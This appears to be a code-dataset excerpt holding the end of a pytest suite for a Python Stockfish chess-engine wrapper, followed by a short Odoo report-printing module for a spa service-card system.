stockfish.get_parameters() == expected_parameters\n assert stockfish._DEFAULT_STOCKFISH_PARAMS == old_parameters\n stockfish.set_skill_level(20)\n expected_parameters[\"Skill Level\"] = 20\n assert stockfish.get_parameters() == old_parameters\n assert stockfish._DEFAULT_STOCKFISH_PARAMS == old_parameters\n\n stockfish.update_engine_parameters({\"Threads\": 4})\n expected_parameters[\"Threads\"] = 4\n assert stockfish.get_parameters() == expected_parameters\n stockfish.update_engine_parameters({\"Hash\": 128})\n expected_parameters[\"Hash\"] = 128\n assert stockfish.get_parameters() == expected_parameters\n stockfish.update_engine_parameters({\"Hash\": 256, \"Threads\": 3})\n expected_parameters.update({\"Hash\": 256, \"Threads\": 3})\n assert stockfish.get_parameters() == expected_parameters\n\n def test_chess960_position(self, stockfish):\n assert \"KQkq\" in stockfish.get_fen_position()\n old_parameters = stockfish.get_parameters()\n expected_parameters = stockfish.get_parameters()\n expected_parameters[\"UCI_Chess960\"] = \"true\"\n stockfish.update_engine_parameters({\"UCI_Chess960\": \"true\"})\n assert \"HAha\" in stockfish.get_fen_position()\n assert 
stockfish.get_parameters() == expected_parameters\n stockfish.set_fen_position(\"4rkr1/4p1p1/8/8/8/8/8/4nK1R w K - 0 100\")\n assert stockfish.get_best_move() == \"f1h1\"\n assert stockfish.get_evaluation() == {\"type\": \"mate\", \"value\": 2}\n assert stockfish.will_move_be_a_capture(\"f1h1\") is Stockfish.Capture.NO_CAPTURE\n assert (\n stockfish.will_move_be_a_capture(\"f1e1\") is Stockfish.Capture.DIRECT_CAPTURE\n )\n stockfish.update_engine_parameters({\"UCI_Chess960\": \"false\"})\n assert stockfish.get_parameters() == old_parameters\n assert stockfish.get_best_move() == \"f1g1\"\n assert stockfish.get_evaluation() == {\"type\": \"mate\", \"value\": 2}\n assert stockfish.will_move_be_a_capture(\"f1g1\") is Stockfish.Capture.NO_CAPTURE\n\n def test_get_board_visual_white(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\", \"d2d4\", \"d7d5\"])\n if stockfish.get_stockfish_major_version() >= 12:\n expected_result = (\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| r | n | b | q | k | b | n | r | 8\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| p | p | p | | | p | p | p | 7\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | p | | | | 6\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | p | | | | | 5\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | P | P | | | | 4\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | | | | | 3\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| P | P | P | | | P | P | P | 2\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| R | N | B | Q | K | B | N | R | 1\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \" a b c d e f g h\\n\"\n )\n else:\n expected_result = (\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| r | n | b | q | k | b | n | r |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| p | p | p | | | p | p | p |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | p | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | p | | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | P | P | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| P | P | P | | | P | P | P |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| R | N | B | Q | K | B | N | R |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n )\n\n assert stockfish.get_board_visual() == expected_result\n\n stockfish._put(\"d\")\n stockfish._read_line() # skip a line\n assert \"+---+---+---+\" in stockfish._read_line()\n # Tests that the previous call to get_board_visual left no remaining lines to be read. 
This means\n # the second line read after stockfish._put(\"d\") now will be the +---+---+---+ of the new outputted board.\n\n def test_get_board_visual_black(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\", \"d2d4\", \"d7d5\"])\n if stockfish.get_stockfish_major_version() >= 12:\n expected_result = (\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| R | N | B | K | Q | B | N | R | 1\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| P | P | P | | | P | P | P | 2\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | | | | | 3\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | P | P | | | | 4\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | p | | | | 5\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | p | | | | | 6\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| p | p | p | | | p | p | p | 7\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| r | n | b | k | q | b | n | r | 8\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \" h g f e d c b a\\n\"\n )\n else:\n expected_result = (\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| R | N | B | K | Q | B | N | R |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| P | P | P | | | P | P | P |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | P | P | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | p | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | p | | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| p | p | p | | | p | p | p |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| r | n | b | k | q | b | n | r |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n )\n\n assert stockfish.get_board_visual(False) == expected_result\n\n stockfish._put(\"d\")\n stockfish._read_line() # skip a line\n assert \"+---+---+---+\" in stockfish._read_line()\n # Tests that the previous call to get_board_visual left no remaining lines to be read. 
This means\n # the second line read after stockfish._put(\"d\") now will be the +---+---+---+ of the new outputted board.\n\n def test_get_fen_position(self, stockfish):\n assert (\n stockfish.get_fen_position()\n == \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\"\n )\n stockfish._put(\"d\")\n stockfish._read_line() # skip a line\n assert \"+---+---+---+\" in stockfish._read_line()\n\n def test_get_fen_position_after_some_moves(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n assert (\n stockfish.get_fen_position()\n == \"rnbqkbnr/pppp1ppp/4p3/8/4P3/8/PPPP1PPP/RNBQKBNR w KQkq - 0 2\"\n )\n\n def test_get_stockfish_major_version(self, stockfish):\n assert (\n stockfish.get_stockfish_major_version() in (8, 9, 10, 11, 12, 13, 14, 15)\n ) != stockfish.is_development_build_of_engine()\n\n def test_get_evaluation_cp(self, stockfish):\n stockfish.set_depth(20)\n stockfish.set_fen_position(\n \"r4rk1/pppb1p1p/2nbpqp1/8/3P4/3QBN2/PPP1BPPP/R4RK1 w - - 0 11\"\n )\n evaluation = stockfish.get_evaluation()\n assert (\n evaluation[\"type\"] == \"cp\"\n and evaluation[\"value\"] >= 60\n and evaluation[\"value\"] <= 150\n )\n\n def test_get_evaluation_checkmate(self, stockfish):\n stockfish.set_fen_position(\"1nb1k1n1/pppppppp/8/6r1/5bqK/6r1/8/8 w - - 2 2\")\n assert stockfish.get_evaluation() == {\"type\": \"mate\", \"value\": 0}\n\n def test_get_evaluation_stalemate(self, stockfish):\n stockfish.set_fen_position(\"1nb1kqn1/pppppppp/8/6r1/5b1K/6r1/8/8 w - - 2 2\")\n assert stockfish.get_evaluation() == {\"type\": \"cp\", \"value\": 0}\n\n def test_set_depth(self, stockfish):\n stockfish.set_depth(12)\n assert stockfish.depth == \"12\"\n stockfish.get_best_move()\n assert \"depth 12\" in stockfish.info\n\n def test_get_best_move_wrong_position(self, stockfish):\n stockfish.set_depth(2)\n wrong_fen = \"3kk3/8/8/8/8/8/8/3KK3 w - - 0 0\"\n stockfish.set_fen_position(wrong_fen)\n assert stockfish.get_best_move() in (\n \"d1e2\",\n \"d1c1\",\n \"d1c2\",\n )\n\n def test_constructor(self, stockfish):\n # Will also use a new stockfish instance in order to test sending\n # params to the constructor.\n\n stockfish_2 = Stockfish(\n depth=16, parameters={\"MultiPV\": 2, \"UCI_Elo\": 2850, \"UCI_Chess960\": \"true\"}\n )\n assert (\n stockfish_2.get_fen_position()\n == \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w HAha - 0 1\"\n )\n assert (\n stockfish.get_fen_position()\n == \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\"\n )\n\n stockfish_2.get_best_move()\n stockfish.get_best_move()\n assert \"multipv 2\" in stockfish_2.info\n assert \"depth 16\" in stockfish_2.info\n assert stockfish_2.depth == \"16\"\n assert \"multipv 1\" in stockfish.info\n assert \"depth 15\" in stockfish.info\n assert stockfish.depth == \"15\"\n\n stockfish_1_params = stockfish.get_parameters()\n stockfish_2_params = stockfish_2.get_parameters()\n for key in stockfish_2_params.keys():\n if key == \"MultiPV\":\n assert stockfish_2_params[key] == 2\n assert stockfish_1_params[key] == 1\n elif key == \"UCI_Elo\":\n assert stockfish_2_params[key] == 2850\n assert stockfish_1_params[key] == 1350\n elif key == \"UCI_LimitStrength\":\n assert stockfish_2_params[key] == \"true\"\n assert stockfish_1_params[key] == \"false\"\n elif key == \"UCI_Chess960\":\n assert stockfish_2_params[key] == \"true\"\n assert stockfish_1_params[key] == \"false\"\n else:\n assert stockfish_2_params[key] == stockfish_1_params[key]\n\n def test_parameters_functions(self, stockfish):\n old_parameters = 
stockfish.get_parameters()\n stockfish.set_fen_position(\"4rkr1/4p1p1/8/8/8/8/8/5K1R w H - 0 100\")\n assert stockfish.get_best_move() == \"f1g1\" # ensures Chess960 param is false.\n assert stockfish.get_fen_position() == \"4rkr1/4p1p1/8/8/8/8/8/5K1R w K - 0 100\"\n assert \"multipv 1\" in stockfish.info\n stockfish.update_engine_parameters(\n {\n \"Minimum Thinking Time\": 10,\n \"Hash\": 32,\n \"MultiPV\": 2,\n \"UCI_Chess960\": \"true\",\n }\n )\n assert stockfish.get_fen_position() == \"4rkr1/4p1p1/8/8/8/8/8/5K1R w H - 0 100\"\n assert stockfish.get_best_move() == \"f1h1\"\n assert \"multipv 2\" in stockfish.info\n updated_parameters = stockfish.get_parameters()\n for key, value in updated_parameters.items():\n if key == \"Minimum Thinking Time\":\n assert value == 10\n elif key == \"Hash\":\n assert value == 32\n elif key == \"MultiPV\":\n assert value == 2\n elif key == \"UCI_Chess960\":\n assert value == \"true\"\n else:\n assert updated_parameters[key] == old_parameters[key]\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n stockfish.update_engine_parameters({\"UCI_Elo\": 2000, \"Skill Level\": 19})\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 2000\n assert stockfish.get_parameters()[\"Skill Level\"] == 19\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n stockfish.update_engine_parameters({\"UCI_Elo\": 2000})\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"true\"\n stockfish.update_engine_parameters({\"Skill Level\": 20})\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n assert stockfish.get_fen_position() == \"4rkr1/4p1p1/8/8/8/8/8/5K1R w H - 0 100\"\n stockfish.reset_engine_parameters()\n assert stockfish.get_parameters() == old_parameters\n assert stockfish.get_fen_position() == \"4rkr1/4p1p1/8/8/8/8/8/5K1R w K - 0 100\"\n with pytest.raises(ValueError):\n stockfish.update_engine_parameters({\"Not an existing key\", \"value\"})\n\n def test_get_top_moves(self, stockfish):\n stockfish.set_depth(15)\n stockfish._set_option(\"MultiPV\", 4)\n stockfish.set_fen_position(\"1rQ1r1k1/5ppp/8/8/1R6/8/2r2PPP/4R1K1 w - - 0 1\")\n assert stockfish.get_top_moves(2) == [\n {\"Move\": \"e1e8\", \"Centipawn\": None, \"Mate\": 1},\n {\"Move\": \"c8e8\", \"Centipawn\": None, \"Mate\": 2},\n ]\n stockfish.set_fen_position(\"8/8/8/8/8/3r2k1/8/6K1 w - - 0 1\")\n assert stockfish.get_top_moves(2) == [\n {\"Move\": \"g1f1\", \"Centipawn\": None, \"Mate\": -2},\n {\"Move\": \"g1h1\", \"Centipawn\": None, \"Mate\": -1},\n ]\n\n def test_get_top_moves_mate(self, stockfish):\n stockfish.set_depth(10)\n stockfish._set_option(\"MultiPV\", 3)\n stockfish.set_fen_position(\"8/8/8/8/8/6k1/8/3r2K1 w - - 0 1\")\n assert stockfish.get_top_moves() == []\n assert stockfish.get_parameters()[\"MultiPV\"] == 3\n\n def test_get_top_moves_raising_error(self, stockfish):\n stockfish.set_fen_position(\n \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\"\n )\n with pytest.raises(ValueError):\n stockfish.get_top_moves(0)\n assert len(stockfish.get_top_moves(2)) == 2\n assert stockfish.get_parameters()[\"MultiPV\"] == 1\n\n def test_make_moves_from_current_position(self, stockfish):\n stockfish.set_fen_position(\n \"r1bqkb1r/pppp1ppp/2n2n2/1B2p3/4P3/5N2/PPPP1PPP/RNBQK2R w KQkq - 0 1\"\n )\n fen_1 = stockfish.get_fen_position()\n stockfish.make_moves_from_current_position([])\n assert fen_1 == stockfish.get_fen_position()\n\n stockfish.make_moves_from_current_position([\"e1g1\"])\n assert (\n 
stockfish.get_fen_position()\n == \"r1bqkb1r/pppp1ppp/2n2n2/1B2p3/4P3/5N2/PPPP1PPP/RNBQ1RK1 b kq - 1 1\"\n )\n\n stockfish.make_moves_from_current_position(\n [\"f6e4\", \"d2d4\", \"e4d6\", \"b5c6\", \"d7c6\", \"d4e5\", \"d6f5\"]\n )\n assert (\n stockfish.get_fen_position()\n == \"r1bqkb1r/ppp2ppp/2p5/4Pn2/8/5N2/PPP2PPP/RNBQ1RK1 w kq - 1 5\"\n )\n\n stockfish.make_moves_from_current_position(\n [\"d1d8\", \"e8d8\", \"b1c3\", \"d8e8\", \"f1d1\", \"f5e7\", \"h2h3\", \"f7f5\"]\n )\n assert (\n stockfish.get_fen_position()\n == \"r1b1kb1r/ppp1n1pp/2p5/4Pp2/8/2N2N1P/PPP2PP1/R1BR2K1 w - f6 0 9\"\n )\n\n stockfish.set_fen_position(\n \"r1bqk2r/pppp1ppp/8/8/1b2n3/2N5/PPP2PPP/R1BQK2R w Qkq - 0 1\"\n )\n\n invalid_moves = [\"d1e3\", \"e1g1\", \"c3d5\", \"c1d4\", \"a7a6\", \"e1d2\", \"word\"]\n\n for invalid_move in invalid_moves:\n with pytest.raises(ValueError):\n stockfish.make_moves_from_current_position([invalid_move])\n\n def test_make_moves_transposition_table_speed(self, stockfish):\n \"\"\"\n make_moves_from_current_position won't send the \"ucinewgame\" token to Stockfish, since it\n will reach a new position similar to the current one. Meanwhile, set_fen_position will send this\n token (unless the user specifies otherwise), since it could be going to a completely new position.\n\n A big effect of sending this token is that it resets SF's transposition table. If the\n new position is similar to the current one, this will affect SF's speed. This function tests\n that make_moves_from_current_position doesn't reset the transposition table, by verifying SF is faster in\n evaluating a consecutive set of positions when the make_moves_from_current_position function is used.\n \"\"\"\n\n stockfish.set_depth(16)\n positions_considered = []\n stockfish.set_fen_position(\n \"rnbqkbnr/ppp1pppp/8/3p4/2PP4/8/PP2PPPP/RNBQKBNR b KQkq - 0 2\"\n )\n\n total_time_calculating_first = 0.0\n for i in range(5):\n start = default_timer()\n chosen_move = stockfish.get_best_move()\n total_time_calculating_first += default_timer() - start\n positions_considered.append(stockfish.get_fen_position())\n stockfish.make_moves_from_current_position([chosen_move])\n\n total_time_calculating_second = 0.0\n for i in range(len(positions_considered)):\n stockfish.set_fen_position(positions_considered[i])\n start = default_timer()\n stockfish.get_best_move()\n total_time_calculating_second += default_timer() - start\n\n assert total_time_calculating_first < total_time_calculating_second\n\n def test_get_wdl_stats(self, stockfish):\n stockfish.set_depth(15)\n stockfish._set_option(\"MultiPV\", 2)\n if stockfish.does_current_engine_version_have_wdl_option():\n stockfish.get_wdl_stats() # Testing that this doesn't raise a RuntimeError.\n stockfish.set_fen_position(\"7k/4R3/4P1pp/7N/8/8/1q5q/3K4 w - - 0 1\")\n wdl_stats = stockfish.get_wdl_stats()\n assert wdl_stats[1] > wdl_stats[0] * 7\n assert abs(wdl_stats[0] - wdl_stats[2]) / wdl_stats[0] < 0.1\n\n stockfish.set_fen_position(\n \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\"\n )\n wdl_stats_2 = stockfish.get_wdl_stats()\n assert wdl_stats_2[1] > wdl_stats_2[0] * 3.5\n assert wdl_stats_2[0] > wdl_stats_2[2] * 1.8\n\n stockfish.set_fen_position(\"8/8/8/8/8/6k1/6p1/6K1 w - - 0 1\")\n assert stockfish.get_wdl_stats() is None\n\n stockfish.set_fen_position(\n \"rnbqkb1r/pp3ppp/3p1n2/1B2p3/3NP3/2N5/PPP2PPP/R1BQK2R b KQkq - 0 6\"\n )\n assert len(stockfish.get_wdl_stats()) == 3\n\n stockfish.set_fen_position(\"8/8/8/8/8/3k4/3p4/3K4 w - - 0 1\")\n assert 
stockfish.get_wdl_stats() is None\n else:\n with pytest.raises(RuntimeError):\n stockfish.get_wdl_stats()\n\n def test_does_current_engine_version_have_wdl_option(self, stockfish):\n if stockfish.get_stockfish_major_version() <= 11:\n assert not stockfish.does_current_engine_version_have_wdl_option()\n with pytest.raises(RuntimeError):\n stockfish.get_wdl_stats()\n\n def test_benchmark_result_with_defaults(self, stockfish):\n params = stockfish.BenchmarkParameters()\n result = stockfish.benchmark(params)\n # result should contain the last line of a successful method call\n assert result.split(\" \")[0] == \"Nodes/second\"\n\n def test_benchmark_result_with_valid_options(self, stockfish):\n params = stockfish.BenchmarkParameters(\n ttSize=64, threads=2, limit=1000, limitType=\"movetime\", evalType=\"classical\"\n )\n result = stockfish.benchmark(params)\n # result should contain the last line of a successful method call\n assert result.split(\" \")[0] == \"Nodes/second\"\n\n def test_benchmark_result_with_invalid_options(self, stockfish):\n params = stockfish.BenchmarkParameters(\n ttSize=2049,\n threads=0,\n limit=0,\n fenFile=\"./fakefile.fen\",\n limitType=\"fghthtr\",\n evalType=\"\",\n )\n result = stockfish.benchmark(params)\n # result should contain the last line of a successful method call\n assert result.split(\" \")[0] == \"Nodes/second\"\n\n def test_benchmark_result_with_invalid_type(self, stockfish):\n params = {\n \"ttSize\": 16,\n \"threads\": 1,\n \"limit\": 13,\n \"fenFile\": \"./fakefile.fen\",\n \"limitType\": \"depth\",\n \"evalType\": \"mixed\",\n }\n result = stockfish.benchmark(params)\n # result should contain the last line of a successful method call\n assert result.split(\" \")[0] == \"Nodes/second\"\n\n def test_multiple_calls_to_del(self, stockfish):\n assert stockfish._stockfish.poll() is None\n assert not stockfish._has_quit_command_been_sent\n stockfish.__del__()\n assert stockfish._stockfish.poll() is not None\n assert stockfish._has_quit_command_been_sent\n stockfish.__del__()\n assert stockfish._stockfish.poll() is not None\n assert stockfish._has_quit_command_been_sent\n\n def test_multiple_quit_commands(self, stockfish):\n # Test multiple quit commands, and include a call to del too. 
All of\n        # them should run without raising an exception.\n        assert stockfish._stockfish.poll() is None\n        assert not stockfish._has_quit_command_been_sent\n        stockfish._put(\"quit\")\n        assert stockfish._has_quit_command_been_sent\n        stockfish._put(\"quit\")\n        assert stockfish._has_quit_command_been_sent\n        stockfish.__del__()\n        assert stockfish._stockfish.poll() is not None\n        assert stockfish._has_quit_command_been_sent\n        stockfish._put(f\"go depth {10}\")\n        # Should do nothing, and change neither of the values below.\n        assert stockfish._stockfish.poll() is not None\n        assert stockfish._has_quit_command_been_sent\n\n    def test_what_is_on_square(self, stockfish):\n        stockfish.set_fen_position(\n            \"rnbq1rk1/ppp1ppbp/5np1/3pP3/8/BPN5/P1PP1PPP/R2QKBNR w KQ d6 0 6\"\n        )\n        assert stockfish.get_what_is_on_square(\"a1\") is Stockfish.Piece.WHITE_ROOK\n        assert stockfish.get_what_is_on_square(\"a8\") is Stockfish.Piece.BLACK_ROOK\n        assert stockfish.get_what_is_on_square(\"g8\") is Stockfish.Piece.BLACK_KING\n        assert stockfish.get_what_is_on_square(\"e1\") is Stockfish.Piece.WHITE_KING\n        assert stockfish.get_what_is_on_square(\"h2\") is Stockfish.Piece.WHITE_PAWN\n        assert stockfish.get_what_is_on_square(\"f8\") is Stockfish.Piece.BLACK_ROOK\n        assert stockfish.get_what_is_on_square(\"d6\") is None\n        assert stockfish.get_what_is_on_square(\"h7\") is Stockfish.Piece.BLACK_PAWN\n        assert stockfish.get_what_is_on_square(\"c3\") is Stockfish.Piece.WHITE_KNIGHT\n        assert stockfish.get_what_is_on_square(\"a3\") is Stockfish.Piece.WHITE_BISHOP\n        assert stockfish.get_what_is_on_square(\"h8\") is None\n        assert stockfish.get_what_is_on_square(\"d1\") is Stockfish.Piece.WHITE_QUEEN\n        assert stockfish.get_what_is_on_square(\"d4\") is None\n        assert stockfish.get_what_is_on_square(\"f6\") is Stockfish.Piece.BLACK_KNIGHT\n        assert stockfish.get_what_is_on_square(\"g7\") is Stockfish.Piece.BLACK_BISHOP\n        assert stockfish.get_what_is_on_square(\"d8\") is Stockfish.Piece.BLACK_QUEEN\n        with pytest.raises(ValueError):\n            stockfish.get_what_is_on_square(\"i1\")\n        with pytest.raises(ValueError):\n            stockfish.get_what_is_on_square(\"b9\")\n\n    def test_13_return_values_from_what_is_on_square(self, stockfish):\n        stockfish.set_fen_position(\n            \"rnbq1rk1/ppp1ppbp/5np1/3pP3/8/BPN5/P1PP1PPP/R2QKBNR w KQ d6 0 6\"\n        )\n        expected_enum_members = [\n            \"WHITE_PAWN\",\n            \"BLACK_PAWN\",\n            \"WHITE_KNIGHT\",\n            \"BLACK_KNIGHT\",\n            \"WHITE_BISHOP\",\n            \"BLACK_BISHOP\",\n            \"WHITE_ROOK\",\n            \"BLACK_ROOK\",\n            \"WHITE_QUEEN\",\n            \"BLACK_QUEEN\",\n            \"WHITE_KING\",\n            \"BLACK_KING\",\n        ]\n        rows = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\"]\n        cols = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\n        for row in rows:\n            for col in cols:\n                val = stockfish.get_what_is_on_square(row + col)\n                assert val is None or val.name in expected_enum_members\n\n    def test_will_move_be_a_capture(self, stockfish):\n        stockfish.set_fen_position(\n            \"1nbq1rk1/Ppp1ppbp/5np1/3pP3/8/BPN5/P1PP1PPP/R2QKBNR w KQ d6 0 6\"\n        )\n        c3d5_result = stockfish.will_move_be_a_capture(\"c3d5\")\n        assert (\n            c3d5_result is Stockfish.Capture.DIRECT_CAPTURE\n            and c3d5_result.name == \"DIRECT_CAPTURE\"\n            and c3d5_result.value == \"direct capture\"\n        )\n        e5d6_result = stockfish.will_move_be_a_capture(\"e5d6\")\n        assert (\n            e5d6_result is Stockfish.Capture.EN_PASSANT\n            and e5d6_result.name == \"EN_PASSANT\"\n            and e5d6_result.value == \"en passant\"\n        )\n        f1e2_result = stockfish.will_move_be_a_capture(\"f1e2\")\n        assert (\n            f1e2_result is Stockfish.Capture.NO_CAPTURE\n            and 
f1e2_result.name == \"NO_CAPTURE\"\n            and f1e2_result.value == \"no capture\"\n        )\n        e5f6_result = stockfish.will_move_be_a_capture(\"e5f6\")\n        assert (\n            e5f6_result is Stockfish.Capture.DIRECT_CAPTURE\n            and e5f6_result.name == \"DIRECT_CAPTURE\"\n            and e5f6_result.value == \"direct capture\"\n        )\n        a3d6_result = stockfish.will_move_be_a_capture(\"a3d6\")\n        assert (\n            a3d6_result is Stockfish.Capture.NO_CAPTURE\n            and a3d6_result.name == \"NO_CAPTURE\"\n            and a3d6_result.value == \"no capture\"\n        )\n        a7a8q_result = stockfish.will_move_be_a_capture(\"a7a8q\")\n        assert (\n            a7a8q_result is Stockfish.Capture.NO_CAPTURE\n            and a7a8q_result.name == \"NO_CAPTURE\"\n            and a7a8q_result.value == \"no capture\"\n        )\n        a7a8b_result = stockfish.will_move_be_a_capture(\"a7a8b\")\n        assert (\n            a7a8b_result is Stockfish.Capture.NO_CAPTURE\n            and a7a8b_result.name == \"NO_CAPTURE\"\n            and a7a8b_result.value == \"no capture\"\n        )\n        a7b8q_result = stockfish.will_move_be_a_capture(\"a7b8q\")\n        assert (\n            a7b8q_result is Stockfish.Capture.DIRECT_CAPTURE\n            and a7b8q_result.name == \"DIRECT_CAPTURE\"\n            and a7b8q_result.value == \"direct capture\"\n        )\n        a7b8r_result = stockfish.will_move_be_a_capture(\"a7b8r\")\n        assert (\n            a7b8r_result is Stockfish.Capture.DIRECT_CAPTURE\n            and a7b8r_result.name == \"DIRECT_CAPTURE\"\n            and a7b8r_result.value == \"direct capture\"\n        )\n\n        with pytest.raises(ValueError):\n            stockfish.will_move_be_a_capture(\"c3c5\")\n\n    @pytest.mark.parametrize(\n        \"fen\",\n        [\n            \"2k2q2/8/8/8/8/8/8/2Q2K2 w - - 0 1\",\n            \"8/8/8/3k4/3K4/8/8/8 b - - 0 1\",\n            \"1q2nB2/pP1k2KP/NN1Q1qP1/8/1P1p4/4p1br/3R4/6n1 w - - 0 1\",\n            \"3rk1n1/ppp3pp/8/8/8/8/PPP5/1KR1R3 w - - 0 1\",\n        ],\n    )\n    def test_invalid_fen_king_attacked(self, stockfish, fen):\n        # Each of these FENs has correct syntax, but\n        # involves a king being attacked while it's the opponent's turn.\n        old_del_counter = Stockfish._del_counter\n        assert Stockfish._is_fen_syntax_valid(fen)\n        if (\n            fen == \"8/8/8/3k4/3K4/8/8/8 b - - 0 1\"\n            and stockfish.get_stockfish_major_version() >= 15\n        ):\n            # Since for that FEN, SF 15 actually outputs a best move without crashing (unlike SF 14 and earlier).\n            return\n        assert not stockfish.is_fen_valid(fen)\n        assert Stockfish._del_counter == old_del_counter + 2\n\n        stockfish.set_fen_position(fen)\n        with pytest.raises(StockfishException):\n            stockfish.get_evaluation()\n\n    def test_is_fen_valid(self, stockfish):\n        old_params = stockfish.get_parameters()\n        old_info = stockfish.info\n        old_depth = stockfish.depth\n        old_fen = stockfish.get_fen_position()\n        correct_fens = [\n            \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\",\n            \"r1bQkb1r/ppp2ppp/2p5/4Pn2/8/5N2/PPP2PPP/RNB2RK1 b kq - 0 8\",\n            \"4k3/8/4K3/8/8/8/8/8 w - - 10 50\",\n            \"r1b1kb1r/ppp2ppp/3q4/8/P2Q4/8/1PP2PPP/RNB2RK1 w kq - 8 15\",\n        ]\n        invalid_syntax_fens = [\n            \"r1bQkb1r/ppp2ppp/2p5/4Pn2/8/5N2/PPP2PPP/RNB2RK b kq - 0 8\",\n            \"rnbqkb1r/pppp1ppp/4pn2/8/2PP4/8/PP2PPPP/RNBQKBNR w KQkq - 3\",\n            \"rn1q1rk1/pbppbppp/1p2pn2/8/2PP4/5NP1/PP2PPBP/RNBQ1RK1 w w - 5 7\",\n            \"4k3/8/4K3/71/8/8/8/8 w - - 10 50\",\n        ]\n        for correct_fen, invalid_syntax_fen in zip(correct_fens, invalid_syntax_fens):\n            old_del_counter = Stockfish._del_counter\n            assert stockfish.is_fen_valid(correct_fen)\n            assert not stockfish.is_fen_valid(invalid_syntax_fen)\n            assert stockfish._is_fen_syntax_valid(correct_fen)\n            assert not stockfish._is_fen_syntax_valid(invalid_syntax_fen)\n            assert Stockfish._del_counter == old_del_counter + 2\n\n        time.sleep(2.0)\n        assert stockfish._stockfish.poll() is None\n        assert 
stockfish.get_parameters() == old_params\n assert stockfish.info == old_info\n assert stockfish.depth == old_depth\n assert stockfish.get_fen_position() == old_fen\n\n def test_send_quit_command(self, stockfish):\n assert stockfish._stockfish.poll() is None\n old_del_counter = Stockfish._del_counter\n stockfish.send_quit_command()\n assert stockfish._stockfish.poll() is not None\n stockfish.__del__()\n assert stockfish._stockfish.poll() is not None\n assert Stockfish._del_counter == old_del_counter + 1\n","repo_name":"zhelyabuzhsky/stockfish","sub_path":"tests/stockfish/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":40357,"program_lang":"python","lang":"en","doc_type":"code","stars":221,"dataset":"github-code","pt":"37"} +{"seq_id":"4091388665","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass RequestMaterialQweb(models.Model):\n _inherit = 'izi.service.card.using'\n\n @api.multi\n def action_print(self):\n return {\n 'type': 'ir.actions.act_url',\n 'url': 'report/pdf/report_qweb.report_template_request_material_view/%s' %(self.id),\n 'target': 'new',\n 'res_id': self.id,\n }\n\n def _name_qweb(self):\n user_id = self.env['res.users'].search([('id', '=', self.env.uid)], limit=1)\n return user_id.name\n\n def _get_name_employee(self,line_id):\n line = self.env['izi.service.card.using.line'].search([('id','=',line_id)])\n name = ''\n for emp in line.employee_ids:\n name = name + ',' + emp.name\n return name[1:]\n\n","repo_name":"butagreeza/korea_spa","sub_path":"addons_custom/report_qweb/models/request_material.py","file_name":"request_material.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 